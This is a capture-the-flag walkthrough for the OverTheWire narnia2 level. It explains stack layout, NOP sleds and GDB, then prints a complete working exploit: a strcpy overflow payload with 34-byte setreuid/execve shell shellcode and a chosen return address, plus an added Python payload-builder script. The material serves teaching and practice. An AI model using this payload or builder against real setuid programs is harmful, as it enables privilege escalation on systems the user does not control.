Another class of vulnerability is a fixed-size array that is filled with user input or a command-line argument without any bounds check. Exploiting it requires an understanding of the stack. Let's look at a simple program first.
#include <stdio.h>
int main()
{
    int a;      /* a local variable, stored below the return address */
    char b[3];  /* a fixed-size array, stored below a */
    return 0;
}
When the program starts executing, the first thing it does is enter main. Whoever called main needs a return address, the address of the instruction to continue from once main returns, and that address is pushed onto the stack first. Below it (at lower addresses) the saved frame pointer is pushed, then variable a is stored, and below that the array b. On 32-bit x86, where the stack grows toward lower addresses, memory is laid out as:

    higher addresses
    +-----------------------+
    |  return address       |   <- overwriting this redirects execution
    +-----------------------+
    |  saved frame pointer  |
    +-----------------------+
    |  a                    |
    +-----------------------+
    |  b[0..2]              |   <- writes past b[2] run upward, toward the return address
    +-----------------------+
    lower addresses

The compiler decides the exact order of the locals, but the return address always sits above them, so a write that overruns b eventually reaches it.
So when a program copies user input into a buffer that is large enough to hold shellcode and never checks the length, you can put shellcode in that buffer, and if the binary is setuid (as the narnia levels are) the shell you spawn runs with the file owner's privileges.
How? Put the shellcode in the buffer, overwrite the function's saved return address with an address that falls inside the buffer, and fill the bytes in front of the shellcode with no-operation instructions (0x90 on x86). When the function returns, execution lands somewhere in the run of NOPs and slides forward into the shellcode, so the exact address of the shellcode does not have to be known.
Running the program with this input therefore executes the shellcode. This is called the NOP sled method.
You need to know a few things about GDB to do all of the above. GDB (the GNU Debugger) lets you view the assembly of a binary, set breakpoints, and watch the program execute step by step.
disas/disassemble shows the assembly code of the executable (for example, disas main shows the main function).
x/nx $address examines n units of memory (4-byte words by default) in hex, starting at the address held in $address and moving upward. x/150x $esp, for instance, dumps 150 words starting at the stack pointer, which is how you find your input on the stack and pick a return address inside the NOP sled.
narnia2 copies its command-line argument into a 128-byte array with a plain string copy and no length check:
strcpy(buf,argv[1]);   /* buf is char buf[128]; argv[1] can be any length */
We can exploit this by overrunning buf until we reach the saved return address on the stack, replacing it with an address inside buf, and placing our shellcode in the buffer.
gdb /narnia/narnia2
(gdb) disas main
(gdb) quit
The output is shown in the following snap:
Next, run it under gdb with 144 bytes of 0x41 ("A") as the argument. 144 bytes is enough to reach and overwrite the saved return address, so when main returns the four A's that landed on it show up in EIP as 0x41414141:
gdb --args /narnia/narnia2 $(python -c 'print "\x41"*144')
(gdb) run
(gdb) quit
We can use the shellcode from the previous level as the payload. It is 34 bytes long, so the 144-byte input consists of 106 no-op bytes (0x90) forming the sled, followed by the 34-byte shellcode, followed by the 4-byte return address: 144 - (34 + 4) = 106. For this first run the return address is left as four zero bytes, because all we want is to dump the stack and see where the sled landed (bash drops NUL bytes from $(...), so the argument is really 140 bytes here, which does not matter for inspecting the stack).
gdb --args /narnia/narnia2 $(python -c 'print "\x90"*106+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x00\x00\x00\x00"')
(gdb) run
(gdb) x/150x $esp
(gdb) quit
Snap:
/narnia/narnia2 $(python -c 'print "\x90"*106+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\xc0\xd7\xff\xff"')
The address 0xffffd7c0 is written least-significant byte first ("\xc0\xd7\xff\xff") because x86 is little-endian. It was picked from the x/150x $esp dump so that it points inside the run of 0x90 bytes; since gdb's environment shifts stack addresses by a few bytes compared with a plain run, aim for the middle of the sled rather than its start or the shellcode itself.
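The NOP sled construction described above and the concrete narnia2 payload (106 NOPs, 34-byte shellcode, 4-byte return address) can be built with a small script instead of a python -c one-liner. The following is an added example, not code from the original page or from the OverTheWire narnia sources; it takes the 144-byte distance and the 0xffffd7c0 address from the page as given, assumes Python 3 (the page's one-liners are Python 2, where print writes the raw bytes; under Python 3 the same syntax fails), and the buffer addresses passed to lands_in_sled in the usage note are constructed values, not measured ones.

```python
"""Payload builder for the narnia2-style stack overflow: NOP sled + shellcode + return address."""
import struct
import sys

# Shellcode copied from the page (34 bytes). On i386 Linux it performs
# setreuid(geteuid(), geteuid()) via syscalls 49 and 70, then execve("//bin/sh", NULL, NULL).
SHELLCODE = (
    b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80"
    b"\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
    b"\x89\xd1\xcd\x80"
)
NOP = b"\x90"          # x86 single-byte no-op; execution slides across a run of these
TOTAL_LEN = 144        # bytes from the start of buf to the end of the saved return address (page value)
RET_ADDR = 0xFFFFD7C0  # address used in the page's final run; re-measure it with x/150x $esp on your box


def sled_length(total_len, shellcode_len, addr_len=4):
    """Number of NOP bytes so that sled + shellcode + address fills total_len exactly."""
    n = total_len - shellcode_len - addr_len
    if n < 0:
        raise ValueError("shellcode does not fit in front of the return address")
    return n


def build_payload(shellcode=SHELLCODE, ret_addr=RET_ADDR, total_len=TOTAL_LEN):
    """Return sled || shellcode || little-endian ret_addr, refusing payloads with NUL bytes.

    strcpy() stops at the first NUL and $(...) drops NUL bytes entirely, so a payload
    containing one would never reach the return address intact.
    """
    sled = NOP * sled_length(total_len, len(shellcode))
    payload = sled + shellcode + struct.pack("<I", ret_addr)  # "<I" = 4-byte little-endian
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy() and the shell would truncate it")
    return payload


def lands_in_sled(buf_addr, ret_addr, sled_len):
    """True if ret_addr points somewhere inside the NOP sled that starts at buf_addr.

    Landing in the middle of the shellcode instead of the sled crashes the process,
    which is why an address well inside the 0x90 run is chosen from the stack dump.
    """
    return buf_addr <= ret_addr < buf_addr + sled_len


if __name__ == "__main__":
    # Usage, same shape as the page's one-liners:  /narnia/narnia2 "$(python3 payload.py [hex-address])"
    addr = int(sys.argv[1], 16) if len(sys.argv) > 1 else RET_ADDR
    sys.stdout.buffer.write(build_payload(ret_addr=addr))  # raw bytes, no trailing newline
```

Write the raw bytes with sys.stdout.buffer rather than print, otherwise Python 3 would UTF-8-encode every byte above 0x7f and the sled would no longer be 0x90s. With a constructed buffer address of 0xffffd780 the page's 0xffffd7c0 satisfies lands_in_sled(0xffffd780, 0xffffd7c0, 106), while 0xffffd7f0 would not, which is the check to make against the real x/150x $esp output before running the exploit outside gdb.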